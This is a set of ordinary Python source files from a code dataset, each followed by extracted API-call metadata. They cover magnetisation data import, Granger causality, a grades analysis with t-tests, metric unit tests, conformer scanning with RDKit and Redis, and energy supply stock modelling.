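# so that int(line[10:]) reads the count that follows the 10-character prefix.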
# takes filename, imports ovf as pandas dataframe, takes data dimensions in (x,y,z) nodes format
def importOvfFilePandas(this_filename, data_dims, average_to_1D=False, skyrmion=False, core_slice='h'):
ave_axis=None
    raw_data=pd.read_csv(this_filename, header=None, skiprows=28, skipfooter=2, delimiter=r"\s+", engine='python')
    magnetisation_array=np.reshape(raw_data.values, np.append(data_dims[::-1],3))
if skyrmion:
m1=int(data_dims[1]/2-1)
m2=int(data_dims[1]/2+1)
if core_slice=='h':
magnetisation_array=magnetisation_array[:,m1:m2,:]
ave_axis=1
elif core_slice=='v':
magnetisation_array=magnetisation_array[:,:,m1:m2]
ave_axis=2
if average_to_1D:
magnetisation_array=np.mean(magnetisation_array, axis=ave_axis)
magnetisation_array=np.mean(magnetisation_array, axis=0)
elif average_to_1D:
for i in [1,2]:
magnetisation_array=np.mean(magnetisation_array, axis=1)
#print(magnetisation_array.shape)
return magnetisation_array
if __name__=="__main__":
#test=importOvfFilePandas('/home/michael/Desktop/Honours/MuMax3/DataProcessing/SkyrmionData/ovfimporttest/m000035.ovf', (128,128,1), skyrmion=True, h_core_slice=True, average_to_1D=True)
test=import_dir('/home/michael/Desktop/Honours/MuMax3/DataProcessing/HelicoidData/helicoidv8_mid.out/')
#test=importOvfFilePandas('/home/michael/Desktop/Honours/MuMax3/DataProcessing/SkyrmionData/ovfimporttest/m000035.ovf', (128,128,1), skyrmion=True, v_core_slice=True, average_to_1D=True)
#test=importOvfFilePandas('/home/michael/Desktop/Honours/MuMax3/DataProcessing/HelicoidData/helicoidv6.out/m000035.ovf', (2,2,128), average_to_1D=True)
|
[
"numpy.mean",
"os.listdir",
"pandas.read_csv",
"os.path.join",
"re.match",
"numpy.floor",
"numpy.append",
"numpy.empty"
] |
[((1449, 1518), 'numpy.empty', 'np.empty', (['(num_files_to_import, data_dimensions[2])'], {'dtype': '(float, 3)'}), '((num_files_to_import, data_dimensions[2]), dtype=(float, 3))\n', (1457, 1518), True, 'import numpy as np\n'), ((3116, 3204), 'pandas.read_csv', 'pd.read_csv', (['this_filename'], {'header': 'None', 'skiprows': '(28)', 'skipfooter': '(2)', 'delimiter': '"""\\\\s+"""'}), "(this_filename, header=None, skiprows=28, skipfooter=2,\n delimiter='\\\\s+')\n", (3127, 3204), True, 'import pandas as pd\n'), ((730, 746), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (740, 746), False, 'import os\n'), ((1817, 1837), 'os.path.join', 'fs.join', (['path', 'fname'], {}), '(path, fname)\n', (1824, 1837), True, 'import os.path as fs\n'), ((3254, 3283), 'numpy.append', 'np.append', (['data_dims[::-1]', '(3)'], {}), '(data_dims[::-1], 3)\n', (3263, 3283), True, 'import numpy as np\n'), ((945, 972), 're.match', 're.match', (['"""m\\\\d*\\\\.ovf"""', 'el'], {}), "('m\\\\d*\\\\.ovf', el)\n", (953, 972), False, 'import re\n'), ((2514, 2542), 're.match', 're.match', (['""".*Binary.*"""', 'line'], {}), "('.*Binary.*', line)\n", (2522, 2542), False, 'import re\n'), ((3583, 3626), 'numpy.mean', 'np.mean', (['magnetisation_array'], {'axis': 'ave_axis'}), '(magnetisation_array, axis=ave_axis)\n', (3590, 3626), True, 'import numpy as np\n'), ((3650, 3686), 'numpy.mean', 'np.mean', (['magnetisation_array'], {'axis': '(0)'}), '(magnetisation_array, axis=0)\n', (3657, 3686), True, 'import numpy as np\n'), ((2022, 2061), 'numpy.floor', 'np.floor', (['(i * 100 / num_files_to_import)'], {}), '(i * 100 / num_files_to_import)\n', (2030, 2061), True, 'import numpy as np\n'), ((3750, 3786), 'numpy.mean', 'np.mean', (['magnetisation_array'], {'axis': '(1)'}), '(magnetisation_array, axis=1)\n', (3757, 3786), True, 'import numpy as np\n'), ((2088, 2129), 'numpy.floor', 'np.floor', (['(i * 100.0 / num_files_to_import)'], {}), '(i * 100.0 / num_files_to_import)\n', (2096, 2129), True, 'import numpy as np\n'), ((2160, 2199), 'numpy.floor', 'np.floor', (['(i * 100 / num_files_to_import)'], {}), '(i * 100 / num_files_to_import)\n', (2168, 2199), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
#
# Implementation of Granger-Geweke causality
#
#
# Builtin/3rd party package imports
import numpy as np
def granger(CSD, Hfunc, Sigma):
"""
Computes the pairwise Granger-Geweke causalities
for all (non-symmetric!) channel combinations
according to Equation 8 in [1]_.
The transfer functions `Hfunc` and noise covariance
`Sigma` are expected to have been already computed.
Parameters
----------
CSD : (nFreq, N, N) :class:`numpy.ndarray`
Complex cross spectra for all channel combinations ``i,j``
`N` corresponds to number of input channels.
Hfunc : (nFreq, N, N) :class:`numpy.ndarray`
Spectral transfer functions for all channel combinations ``i,j``
Sigma : (N, N) :class:`numpy.ndarray`
The noise covariances
Returns
-------
Granger : (nFreq, N, N) :class:`numpy.ndarray`
Spectral Granger-Geweke causality between all channel
combinations. Directionality follows array
notation: causality from ``i -> j`` is ``Granger[:,i,j]``,
causality from ``j -> i`` is ``Granger[:,j,i]``
See also
--------
    wilson_sf : :func:`~syncopy.connectivity.wilson_sf.wilson_sf`
Spectral matrix factorization that yields the
transfer functions and noise covariances
from a cross spectral density.
Notes
-----
.. [1] Dhamala, Mukeshwar, <NAME>, and <NAME>.
"Estimating Granger causality from Fourier and wavelet transforms
of time series data." Physical review letters 100.1 (2008): 018701.
"""
nChannels = CSD.shape[1]
auto_spectra = CSD.transpose(1, 2, 0).diagonal()
auto_spectra = np.abs(auto_spectra) # auto-spectra are real
# we need the stacked auto-spectra of the form (nChannel=3):
    #            S_11 S_22 S_33
    # Smat(f) =  S_11 S_22 S_33
    #            S_11 S_22 S_33
Smat = auto_spectra[:, None, :] * np.ones(nChannels)[:, None]
# Granger i->j needs H_ji entry
Hmat = np.abs(Hfunc.transpose(0, 2, 1))**2
# Granger i->j needs Sigma_ji entry
SigmaJI = np.abs(Sigma.T)
# imag part should be 0
auto_cov = np.abs(Sigma.diagonal())
# same stacking as for the auto spectra (without freq axis)
SigmaII = auto_cov[None, :] * np.ones(nChannels)[:, None]
# the denominator
denom = SigmaII.T - SigmaJI**2 / SigmaII
denom = Smat - denom * Hmat
# linear causality i -> j
Granger = np.log(Smat / denom)
return Granger
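# Minimal usage sketch (added, not part of the original module): build a
# synthetic cross-spectral density from a random transfer function H and an
# identity noise covariance via CSD(f) = H(f) Sigma H(f)^H -- the factorization
# wilson_sf would normally provide -- and feed it to granger().
if __name__ == "__main__":
    nFreq, nChannels = 4, 3
    rng = np.random.default_rng(42)
    Hfunc = (rng.standard_normal((nFreq, nChannels, nChannels))
             + 1j * rng.standard_normal((nFreq, nChannels, nChannels)))
    Sigma = np.eye(nChannels)
    CSD = Hfunc @ Sigma @ Hfunc.conj().transpose(0, 2, 1)
    G = granger(CSD, Hfunc, Sigma)
    print(G.shape)  # (4, 3, 3); causality i -> j sits in G[:, i, j]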
|
[
"numpy.abs",
"numpy.log",
"numpy.ones"
] |
[((1711, 1731), 'numpy.abs', 'np.abs', (['auto_spectra'], {}), '(auto_spectra)\n', (1717, 1731), True, 'import numpy as np\n'), ((2119, 2134), 'numpy.abs', 'np.abs', (['Sigma.T'], {}), '(Sigma.T)\n', (2125, 2134), True, 'import numpy as np\n'), ((2475, 2495), 'numpy.log', 'np.log', (['(Smat / denom)'], {}), '(Smat / denom)\n', (2481, 2495), True, 'import numpy as np\n'), ((1953, 1971), 'numpy.ones', 'np.ones', (['nChannels'], {}), '(nChannels)\n', (1960, 1971), True, 'import numpy as np\n'), ((2302, 2320), 'numpy.ones', 'np.ones', (['nChannels'], {}), '(nChannels)\n', (2309, 2320), True, 'import numpy as np\n')]
|
# Matplotlib
# visualization package for Python data science
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
#%matplotlib inline # lets Jupyter notebooks draw plots
# without having to call show()
# data = np.arange(10)
# plt.plot(data)
# plt.show()
# scatter plot - generate 100 standard-normal random points
points = []
for i in range(100): # 0 ~ 99
    x = np.random.normal(0,1) # standard normal random number
    y = x + 0.1 + 0.2 + np.random.normal(0,1)
    points.append([x, y])
print(points)
x_data = [ v[0] for v in points ] # v = [x, y] -> take x
y_data = [ v[1] for v in points ] # v = [x, y] -> take y
plt.plot(x_data, y_data, 'ro')
plt.show()
# load the grade data
df = pd.read_excel('c:/Java/sungjuk.xlsx')
# compute total and average, then add them to df
subj = ['국어', '영어', '수학', '과학']
df['총점'] = df[subj].sum(axis=1)
df['평균'] = df['총점'] / len(subj)
df.sort_values(['평균'], ascending=[False]) # sort by average (the result is not stored here)
import matplotlib as mpl
mpl.rc('font', family='Malgun Gothic') # set a font that can render Hangul in plots
sj = df.sort_values(['평균'], ascending=[False])
sj.index = sj['이름']
sj['평균'].plot(kind='bar', figsize=(8,4))
# compare grades - which class did better?
ban1 = df[df['반'] == 1]
ban2 = df[df['반'] == 2]
ban1_mean = ban1['총점'].sum() / (6 * 4)
ban2_mean = ban2['총점'].sum() / (6 * 4)
print(ban1_mean, ban2_mean) # 79.042 vs 77.125
# is the difference between the two group means statistically significant? (t-test)
# when the p-value is 0.005 or below, we can say the means differ
import scipy.stats as stats
result = stats.ttest_ind(ban1['평균'], ban2['평균'])
print(result) # pvalue=0.755583336185639
# then, do the per-subject averages differ? (t-test)
for sub in subj:
print(sub, stats.ttest_ind(ban1[sub], ban2[sub]))
# 국어 pvalue=0.031982494983816424
# 영어 pvalue=0.5518533781528807
# 수학 pvalue=0.1654958420079056
# 과학 pvalue=0.0014931977711732465
# plot the full grade data
sj[subj].plot(kind='bar', figsize=(10,6))
# score distribution per subject - box-and-whisker plot
df[subj].boxplot(return_type='axes')
# per-subject score distribution for class 1 and class 2
ban1[subj].boxplot(return_type='axes') # class 1
ban2[subj].boxplot(return_type='axes') # class 2
# correlation between subjects - 'math:science' and 'Korean:English'
df.plot(kind='scatter', x='수학', y='과학')
print( stats.pearsonr( df['수학'], df['과학'] ) ) # Pearson correlation coefficient
# 0.5632890597067751 (correlation), 0.05650580486155532 (p-value)
# correlation between subjects - 'math:science' and 'Korean:English'
df.plot(kind='scatter', x='국어', y='영어')
print( stats.pearsonr( df['국어'], df['영어'] ) ) # Pearson correlation coefficient
# 0.10566562777973997 (correlation), 0.7437959551857836 (p-value)
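# Added illustration (synthetic data, not from sungjuk.xlsx): two samples drawn
# from clearly different normal distributions give a t-test p-value far below
# 0.05, i.e. the means differ significantly.
sample1 = np.random.normal(70, 5, 100)
sample2 = np.random.normal(80, 5, 100)
print(stats.ttest_ind(sample1, sample2))  # p-value effectively 0 here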
|
[
"numpy.random.normal",
"scipy.stats.pearsonr",
"matplotlib.pyplot.plot",
"scipy.stats.ttest_ind",
"matplotlib.rc",
"pandas.read_excel",
"matplotlib.pyplot.show"
] |
[((550, 580), 'matplotlib.pyplot.plot', 'plt.plot', (['x_data', 'y_data', '"""ro"""'], {}), "(x_data, y_data, 'ro')\n", (558, 580), True, 'import matplotlib.pyplot as plt\n'), ((582, 592), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (590, 592), True, 'import matplotlib.pyplot as plt\n'), ((617, 654), 'pandas.read_excel', 'pd.read_excel', (['"""c:/Java/sungjuk.xlsx"""'], {}), "('c:/Java/sungjuk.xlsx')\n", (630, 654), True, 'import pandas as pd\n'), ((861, 899), 'matplotlib.rc', 'mpl.rc', (['"""font"""'], {'family': '"""Malgun Gothic"""'}), "('font', family='Malgun Gothic')\n", (867, 899), True, 'import matplotlib as mpl\n'), ((1348, 1387), 'scipy.stats.ttest_ind', 'stats.ttest_ind', (["ban1['평균']", "ban2['평균']"], {}), "(ban1['평균'], ban2['평균'])\n", (1363, 1387), True, 'import scipy.stats as stats\n'), ((334, 356), 'numpy.random.normal', 'np.random.normal', (['(0)', '(1)'], {}), '(0, 1)\n', (350, 356), True, 'import numpy as np\n'), ((2004, 2038), 'scipy.stats.pearsonr', 'stats.pearsonr', (["df['수학']", "df['과학']"], {}), "(df['수학'], df['과학'])\n", (2018, 2038), True, 'import scipy.stats as stats\n'), ((2192, 2226), 'scipy.stats.pearsonr', 'stats.pearsonr', (["df['국어']", "df['영어']"], {}), "(df['국어'], df['영어'])\n", (2206, 2226), True, 'import scipy.stats as stats\n'), ((393, 415), 'numpy.random.normal', 'np.random.normal', (['(0)', '(1)'], {}), '(0, 1)\n', (409, 415), True, 'import numpy as np\n'), ((1498, 1535), 'scipy.stats.ttest_ind', 'stats.ttest_ind', (['ban1[sub]', 'ban2[sub]'], {}), '(ban1[sub], ban2[sub])\n', (1513, 1535), True, 'import scipy.stats as stats\n')]
|
# -*- coding: utf-8 -*-
import unittest
import numpy as np
import torch
from comet.metrics import RegressionReport, WMTKendall
class TestMetrics(unittest.TestCase):
def test_regression_report(self):
report = RegressionReport()
a = np.array([0, 0, 0, 1, 1, 1, 1])
b = np.arange(7)
expected = {
"pearson": torch.tensor(0.8660254, dtype=torch.float32),
"kendall": torch.tensor(0.7559289, dtype=torch.float32),
"spearman": torch.tensor(0.866025, dtype=torch.float32),
}
result = report.compute(a, b)
self.assertDictEqual(
{k: round(v.item(), 4) for k, v in result.items()},
{k: round(v.item(), 4) for k, v in expected.items()},
)
def test_wmt_kendall(self):
metric = WMTKendall()
pos = torch.tensor([0, 0.5, 1])
neg = torch.tensor([1, 0.5, 0])
expected = (1 - 2) / (1 + 2)
self.assertEqual(metric.compute(pos, neg), expected)
|
[
"comet.metrics.RegressionReport",
"numpy.array",
"torch.tensor",
"comet.metrics.WMTKendall",
"numpy.arange"
] |
[((224, 242), 'comet.metrics.RegressionReport', 'RegressionReport', ([], {}), '()\n', (240, 242), False, 'from comet.metrics import RegressionReport, WMTKendall\n'), ((255, 286), 'numpy.array', 'np.array', (['[0, 0, 0, 1, 1, 1, 1]'], {}), '([0, 0, 0, 1, 1, 1, 1])\n', (263, 286), True, 'import numpy as np\n'), ((299, 311), 'numpy.arange', 'np.arange', (['(7)'], {}), '(7)\n', (308, 311), True, 'import numpy as np\n'), ((808, 820), 'comet.metrics.WMTKendall', 'WMTKendall', ([], {}), '()\n', (818, 820), False, 'from comet.metrics import RegressionReport, WMTKendall\n'), ((836, 861), 'torch.tensor', 'torch.tensor', (['[0, 0.5, 1]'], {}), '([0, 0.5, 1])\n', (848, 861), False, 'import torch\n'), ((876, 901), 'torch.tensor', 'torch.tensor', (['[1, 0.5, 0]'], {}), '([1, 0.5, 0])\n', (888, 901), False, 'import torch\n'), ((356, 400), 'torch.tensor', 'torch.tensor', (['(0.8660254)'], {'dtype': 'torch.float32'}), '(0.8660254, dtype=torch.float32)\n', (368, 400), False, 'import torch\n'), ((425, 469), 'torch.tensor', 'torch.tensor', (['(0.7559289)'], {'dtype': 'torch.float32'}), '(0.7559289, dtype=torch.float32)\n', (437, 469), False, 'import torch\n'), ((495, 538), 'torch.tensor', 'torch.tensor', (['(0.866025)'], {'dtype': 'torch.float32'}), '(0.866025, dtype=torch.float32)\n', (507, 538), False, 'import torch\n')]
|
#!/usr/bin/env python
from redis import Redis
import uuid
import sys
import os
import subprocess
import shutil
import numpy as np
import itertools as it
import json
from rdkit import Chem
from rdkit.Chem import AllChem, ChemicalForceFields
redis = Redis.from_url("redis://" + os.environ.get("EXECUTOR_CONSTR", "127.0.0.1:6379/0"))
ENERGY_THRESHOLD = 1e-4
ANGLE_DELTA = 1e-7
FF_RELAX_STEPS = 50
def clockwork(resolution):
if resolution == 0:
start = 0
step = 360
n_steps = 1
else:
start = 360.0 / 2.0 ** (resolution)
step = 360.0 / 2.0 ** (resolution-1)
n_steps = 2 ** (resolution - 1)
return start, step, n_steps
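# Example (added note): the clockwork scheme at increasing resolution gives
#   resolution 0 -> start=0,   step=360, n_steps=1  (angle 0 only)
#   resolution 1 -> start=180, step=360, n_steps=1  (angle 180)
#   resolution 2 -> start=90,  step=180, n_steps=2  (angles 90, 270)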
def get_classical_constrained_geometry(sdfstr, torsions, molname, dihedrals, angles):
mol = Chem.MolFromMolBlock(sdfstr, removeHs=False)
ffprop = ChemicalForceFields.MMFFGetMoleculeProperties(mol)
ffc = ChemicalForceFields.MMFFGetMoleculeForceField(mol, ffprop)
conformer = mol.GetConformer()
# Set angles and constrains for all torsions
for dih_id, angle in zip(dihedrals, angles):
# Set clockwork angle
        try:
            Chem.rdMolTransforms.SetDihedralDeg(conformer, *torsions[dih_id], float(angle))
        except Exception:
            pass
# Set forcefield constrain
ffc.MMFFAddTorsionConstraint(*torsions[dih_id], False, angle-ANGLE_DELTA, angle+ANGLE_DELTA, 1.0e10)
# reduce bad contacts
try:
ffc.Minimize(maxIts=FF_RELAX_STEPS, energyTol=1e-2, forceTol=1e-3)
except RuntimeError:
pass
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
coordinates = conformer.GetPositions()
return f'{len(atoms)}\n\n' + '\n'.join([f'{element} {coords[0]} {coords[1]} {coords[2]}' for element, coords in zip(atoms, coordinates)])
def do_workpackage(molname, dihedrals, resolution):
ndih = len(dihedrals)
start, step, n_steps = clockwork(resolution)
scanangles = np.arange(start, start+step*n_steps, step)
# fetch input
sdfstr = redis.get(f'clockwork:{molname}:sdf').decode("ascii")
torsions = json.loads(redis.get(f'clockwork:{molname}:dihedrals').decode("ascii"))
accepted_geometries = []
accepted_energies = []
for angles in it.product(scanangles, repeat=ndih):
xyzfile = get_classical_constrained_geometry(sdfstr, torsions, molname, dihedrals, angles)
print (xyzfile)
#optxyzfile, energy, bonds = get_xtb_geoopt(xyzfile)
#if set(bonds) != set(refbonds):
# continue
#for i in range(len(accepted_energies)):
# if abs(accepted_energies[i] - energy) < ENERGY_THRESHOLD:
# # compare geometries optxyzfile vs accepted_geometries
#else:
# accepted_energies.append(energy)
# accepted_geometries.append(optxyzfile)
results = {}
results['mol'] = molname
results['ndih'] = ndih
results['res'] = resolution
results['geometries'] = accepted_geometries
results['energies'] = accepted_energies
return json.dumps(results)
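# Added note: for resolution=2 and three dihedrals the scan angles are
# [90, 270], so it.product(scanangles, repeat=3) in do_workpackage() enumerates
# the 2**3 = 8 combinations (90,90,90), (90,90,270), ..., (270,270,270).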
do_workpackage("debug", (1, 2, 3), 2)
|
[
"rdkit.Chem.MolFromMolBlock",
"itertools.product",
"json.dumps",
"os.environ.get",
"rdkit.Chem.ChemicalForceFields.MMFFGetMoleculeForceField",
"rdkit.Chem.ChemicalForceFields.MMFFGetMoleculeProperties",
"numpy.arange"
] |
[((760, 804), 'rdkit.Chem.MolFromMolBlock', 'Chem.MolFromMolBlock', (['sdfstr'], {'removeHs': '(False)'}), '(sdfstr, removeHs=False)\n', (780, 804), False, 'from rdkit import Chem\n'), ((818, 868), 'rdkit.Chem.ChemicalForceFields.MMFFGetMoleculeProperties', 'ChemicalForceFields.MMFFGetMoleculeProperties', (['mol'], {}), '(mol)\n', (863, 868), False, 'from rdkit.Chem import AllChem, ChemicalForceFields\n'), ((877, 935), 'rdkit.Chem.ChemicalForceFields.MMFFGetMoleculeForceField', 'ChemicalForceFields.MMFFGetMoleculeForceField', (['mol', 'ffprop'], {}), '(mol, ffprop)\n', (922, 935), False, 'from rdkit.Chem import AllChem, ChemicalForceFields\n'), ((1846, 1892), 'numpy.arange', 'np.arange', (['start', '(start + step * n_steps)', 'step'], {}), '(start, start + step * n_steps, step)\n', (1855, 1892), True, 'import numpy as np\n'), ((2127, 2162), 'itertools.product', 'it.product', (['scanangles'], {'repeat': 'ndih'}), '(scanangles, repeat=ndih)\n', (2137, 2162), True, 'import itertools as it\n'), ((2842, 2861), 'json.dumps', 'json.dumps', (['results'], {}), '(results)\n', (2852, 2861), False, 'import json\n'), ((294, 347), 'os.environ.get', 'os.environ.get', (['"""EXECUTOR_CONSTR"""', '"""127.0.0.1:6379/0"""'], {}), "('EXECUTOR_CONSTR', '127.0.0.1:6379/0')\n", (308, 347), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 09:36:07 2015
@author: Ben
"""
from shared_classes import Stock, StockItem, SpecifiedStock
from datamapfunctions import DataMapFunctions, Abstract
import util
import numpy as np
import config as cfg
class SupplyStock(Stock, StockItem):
def __init__(self, id, drivers, sql_id_table='SupplyStock', sql_data_table='SupplyStockData',
primary_key='node_id', **kwargs):
Stock.__init__(self, id, drivers, sql_id_table='SupplyStock', sql_data_table='SupplyStockData',
primary_key='node_id', **kwargs)
StockItem.__init__(self)
def return_stock_slice(self, elements):
group = self.specified.loc[elements].transpose()
return group
class SupplySales(Abstract, DataMapFunctions):
def __init__(self, id, supply_node_id, sql_id_table, sql_data_table, primary_key, data_id_key, reference=False, scenario=None):
self.id = id
self.input_type = 'total'
self.supply_node_id = supply_node_id
self.sql_id_table = sql_id_table
self.sql_data_table = sql_data_table
self.scenario = scenario
self.mapped = False
if reference:
for col, att in util.object_att_from_table(self.sql_id_table, self.supply_node_id, primary_key):
setattr(self, col, att)
DataMapFunctions.__init__(self, data_id_key)
self.read_timeseries_data(supply_node_id=self.supply_node_id)
self.raw_values = util.remove_df_levels(self.raw_values, 'supply_technology')
else:
# measure specific sales does not require technology filtering
Abstract.__init__(self, self.id, primary_key=primary_key, data_id_key=data_id_key)
def calculate(self, vintages, years, interpolation_method=None, extrapolation_method=None):
self.vintages = vintages
self.years = years
self.remap(time_index_name='vintage',fill_timeseries=True, interpolation_method=interpolation_method, extrapolation_method=extrapolation_method, fill_value=np.nan)
self.convert()
def convert(self):
model_energy_unit = cfg.calculation_energy_unit
model_time_step = cfg.cfgfile.get('case', 'time_step')
if self.time_unit is not None:
# if sales has a time_unit, then the unit is energy and must be converted to capacity
self.values = util.unit_convert(self.values, unit_from_num=self.capacity_or_energy_unit,
unit_from_den=self.time_unit, unit_to_num=model_energy_unit,
unit_to_den=model_time_step)
else:
# if sales is a capacity unit, the model must convert the unit type to an energy unit for conversion ()
self.values = util.unit_convert(self.values, unit_from_num=cfg.ureg.Quantity(self.capacity_or_energy_unit)
* cfg.ureg.Quantity(model_time_step),
unit_from_den=model_time_step,
unit_to_num=model_energy_unit,
unit_to_den=model_time_step)
def reconcile_with_stock_levels(self, needed_sales_share_levels, needed_sales_names):
if not set(needed_sales_names).issubset(self.values.index.names):
# we can't have more specificity in sales share than in stock
raise ValueError('Sales share expressed as an intensity cannot have levels not in stock')
# pick up extra levels
self.values = util.expand_multi(self.values, needed_sales_share_levels,
needed_sales_names).sort_index()
class SupplySalesShare(Abstract, DataMapFunctions):
def __init__(self, id, supply_node_id, sql_id_table, sql_data_table, primary_key, data_id_key, reference=False, scenario=None):
self.id = id
self.supply_node_id = supply_node_id
self.sql_id_table = sql_id_table
self.sql_data_table = sql_data_table
self.scenario = scenario
self.mapped = False
self.input_type = 'intensity'
if reference:
for col, att in util.object_att_from_table(self.sql_id_table, self.supply_node_id, primary_key):
if att is not None:
setattr(self, col, att)
DataMapFunctions.__init__(self, data_id_key)
self.read_timeseries_data(supply_node_id=self.supply_node_id)
self.raw_values = util.remove_df_levels(self.raw_values, ['supply_node', 'supply_technology'])
else:
# measure specific sales share does not require technology filtering
Abstract.__init__(self, self.id, primary_key=primary_key, data_id_key=data_id_key)
def calculate(self, vintages, years):
self.vintages = vintages
self.years = years
self.remap(time_index_name='vintage')
def reconcile_with_stock_levels(self, needed_sales_share_levels, needed_sales_share_names):
if self.input_type == 'intensity':
if not set(self.values.index.names).issubset(needed_sales_share_names):
# we can't have more specificity in sales share than in stock
raise ValueError('Sales share expressed as an intensity cannot have levels not in stock')
# pick up extra levels
self.values = util.expand_multi(self.values, needed_sales_share_levels,
needed_sales_share_names).sort_index()
self.values.fillna(0, inplace=True)
elif self.input_type == 'total':
raise ValueError(
'A sales share type of total is not currently supported. Please normalize to sales share as a percentage')
# if not set(sales_share.values.index.names).issubset(stock.values.index.names):
# we have extra salesshare levels and we need to do a groupby sum
# sales_share.values = sales_share.values.groupby(level=needed_sales_share_levels).sum()
# todo: add logic here so that if stock and service demand
# has more specificity than sales share, we raise an exception
@staticmethod
def scale_reference_array_to_gap(ss_array, space_for_reference):
num_years, num_techs, num_techs = np.shape(ss_array)
ref_sums = np.sum(ss_array, axis=1)
# ignore where no reference is specified to avoid dividing by zero
vintage_no_ref, retiring_no_ref = np.nonzero(ref_sums)
factors = np.zeros(np.shape(ref_sums))
factors[vintage_no_ref, retiring_no_ref] += space_for_reference[vintage_no_ref, retiring_no_ref] / ref_sums[
vintage_no_ref, retiring_no_ref]
factors = np.reshape(np.repeat(factors, num_techs, axis=0), (num_years, num_techs, num_techs))
# gross up reference sales share with the need
return ss_array * factors
@staticmethod
def normalize_array(ss_array, retiring_must_have_replacement=True):
# Normalize to 1
sums = np.sum(ss_array, axis=1)
if np.any(sums == 0) and retiring_must_have_replacement:
raise ValueError('Every retiring technology must have a replacement specified in sales share')
        # indices needing scaling
vintage, retiring = np.nonzero(sums != 1)
# normalize all to 1
ss_array[vintage, :, retiring] = (ss_array[vintage, :, retiring].T / sums[vintage, retiring]).T
return ss_array
@staticmethod
def cap_array_at_1(ss_array):
# Normalize down to 1
sums = np.sum(ss_array, axis=1)
vintage, retiring = np.nonzero(sums > 1)
# normalize those greater than 1
ss_array[vintage, :, retiring] = (ss_array[vintage, :, retiring].T / sums[vintage, retiring]).T
return ss_array
class SupplySpecifiedStock(SpecifiedStock):
def __init__(self, id, sql_id_table, sql_data_table, scenario):
SpecifiedStock.__init__(self, id, sql_id_table, sql_data_table, scenario)
def convert(self):
"""
convert values to model currency and capacity (energy_unit/time_step)
"""
if self.values is not None:
model_energy_unit = cfg.calculation_energy_unit
model_time_step = cfg.cfgfile.get('case', 'time_step')
if self.time_unit is not None:
self.values = util.unit_convert(self.values, unit_from_num=self.capacity_or_energy_unit,
unit_from_den=self.time_unit, unit_to_num=model_energy_unit,
unit_to_den=model_time_step)
else:
self.values = util.unit_convert(self.values, unit_from_num=cfg.ureg.Quantity(self.capacity_or_energy_unit)
* cfg.ureg.Quantity(model_time_step),
unit_from_den = model_time_step,
unit_to_num=model_energy_unit,
unit_to_den=model_time_step)
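# Added worked example (illustrative only): for a single vintage with two
# technologies,
#     ss = np.array([[[0.5, 1.0],
#                     [1.5, 1.0]]])
# the sums over axis 1 are [2.0, 2.0], so SupplySalesShare.normalize_array(ss)
# rescales each retiring technology's column to sum to 1, giving
#     [[0.25, 0.5],
#      [0.75, 0.5]]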
|
[
"datamapfunctions.DataMapFunctions.__init__",
"numpy.repeat",
"shared_classes.SpecifiedStock.__init__",
"numpy.any",
"util.expand_multi",
"numpy.sum",
"shared_classes.StockItem.__init__",
"util.remove_df_levels",
"datamapfunctions.Abstract.__init__",
"util.unit_convert",
"numpy.nonzero",
"util.object_att_from_table",
"config.ureg.Quantity",
"config.cfgfile.get",
"numpy.shape",
"shared_classes.Stock.__init__"
] |
[((458, 590), 'shared_classes.Stock.__init__', 'Stock.__init__', (['self', 'id', 'drivers'], {'sql_id_table': '"""SupplyStock"""', 'sql_data_table': '"""SupplyStockData"""', 'primary_key': '"""node_id"""'}), "(self, id, drivers, sql_id_table='SupplyStock',\n sql_data_table='SupplyStockData', primary_key='node_id', **kwargs)\n", (472, 590), False, 'from shared_classes import Stock, StockItem, SpecifiedStock\n'), ((616, 640), 'shared_classes.StockItem.__init__', 'StockItem.__init__', (['self'], {}), '(self)\n', (634, 640), False, 'from shared_classes import Stock, StockItem, SpecifiedStock\n'), ((2234, 2270), 'config.cfgfile.get', 'cfg.cfgfile.get', (['"""case"""', '"""time_step"""'], {}), "('case', 'time_step')\n", (2249, 2270), True, 'import config as cfg\n'), ((6446, 6464), 'numpy.shape', 'np.shape', (['ss_array'], {}), '(ss_array)\n', (6454, 6464), True, 'import numpy as np\n'), ((6485, 6509), 'numpy.sum', 'np.sum', (['ss_array'], {'axis': '(1)'}), '(ss_array, axis=1)\n', (6491, 6509), True, 'import numpy as np\n'), ((6628, 6648), 'numpy.nonzero', 'np.nonzero', (['ref_sums'], {}), '(ref_sums)\n', (6638, 6648), True, 'import numpy as np\n'), ((7184, 7208), 'numpy.sum', 'np.sum', (['ss_array'], {'axis': '(1)'}), '(ss_array, axis=1)\n', (7190, 7208), True, 'import numpy as np\n'), ((7446, 7467), 'numpy.nonzero', 'np.nonzero', (['(sums != 1)'], {}), '(sums != 1)\n', (7456, 7467), True, 'import numpy as np\n'), ((7724, 7748), 'numpy.sum', 'np.sum', (['ss_array'], {'axis': '(1)'}), '(ss_array, axis=1)\n', (7730, 7748), True, 'import numpy as np\n'), ((7777, 7797), 'numpy.nonzero', 'np.nonzero', (['(sums > 1)'], {}), '(sums > 1)\n', (7787, 7797), True, 'import numpy as np\n'), ((8088, 8161), 'shared_classes.SpecifiedStock.__init__', 'SpecifiedStock.__init__', (['self', 'id', 'sql_id_table', 'sql_data_table', 'scenario'], {}), '(self, id, sql_id_table, sql_data_table, scenario)\n', (8111, 8161), False, 'from shared_classes import Stock, StockItem, SpecifiedStock\n'), ((1250, 1329), 'util.object_att_from_table', 'util.object_att_from_table', (['self.sql_id_table', 'self.supply_node_id', 'primary_key'], {}), '(self.sql_id_table, self.supply_node_id, primary_key)\n', (1276, 1329), False, 'import util\n'), ((1383, 1427), 'datamapfunctions.DataMapFunctions.__init__', 'DataMapFunctions.__init__', (['self', 'data_id_key'], {}), '(self, data_id_key)\n', (1408, 1427), False, 'from datamapfunctions import DataMapFunctions, Abstract\n'), ((1532, 1591), 'util.remove_df_levels', 'util.remove_df_levels', (['self.raw_values', '"""supply_technology"""'], {}), "(self.raw_values, 'supply_technology')\n", (1553, 1591), False, 'import util\n'), ((1693, 1780), 'datamapfunctions.Abstract.__init__', 'Abstract.__init__', (['self', 'self.id'], {'primary_key': 'primary_key', 'data_id_key': 'data_id_key'}), '(self, self.id, primary_key=primary_key, data_id_key=\n data_id_key)\n', (1710, 1780), False, 'from datamapfunctions 